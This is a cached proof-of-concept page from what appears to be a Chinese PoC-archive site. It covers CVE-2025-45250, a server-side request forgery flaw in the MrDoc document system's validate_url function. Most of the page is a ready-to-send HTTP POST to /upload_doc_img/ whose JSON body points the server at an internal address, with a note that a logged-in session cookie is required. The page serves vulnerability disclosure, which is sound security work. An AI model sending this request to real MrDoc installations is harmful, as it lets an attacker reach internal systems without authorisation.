POC详情: f5292b6ad28a3adbbf0ac33c1ef417e79350af1b

来源
https://github.com/Anike-x/CVE-2025-45250
关联漏洞
标题: mrdoc 安全漏洞 (CVE-2025-45250)
描述:mrdoc是zmister2016个人开发者的一个基于python开发的在线文档系统。 mrdoc 0.9.5及之前版本存在安全漏洞,该漏洞源于validate_url函数导致服务端请求伪造。
介绍
# CVE-2025-45250

### Suggested description

```
MrDoc <=0.95 is vulnerable to Server-Side Request Forgery (SSRF) in the validate_url function of the app_doc/utils.py file.
```

### POC

```
POST /upload_doc_img/ HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: your cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{
  "url": "http://127.0.0.2"
}
```

To reproduce this vulnerability, you must be logged in to obtain the cookie value. Allows an attacker to trick a server into making malicious requests to internal or external systems
文件快照

 [4.0K]  /data/pocs/f5292b6ad28a3adbbf0ac33c1ef417e79350af1b
└── [ 923]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。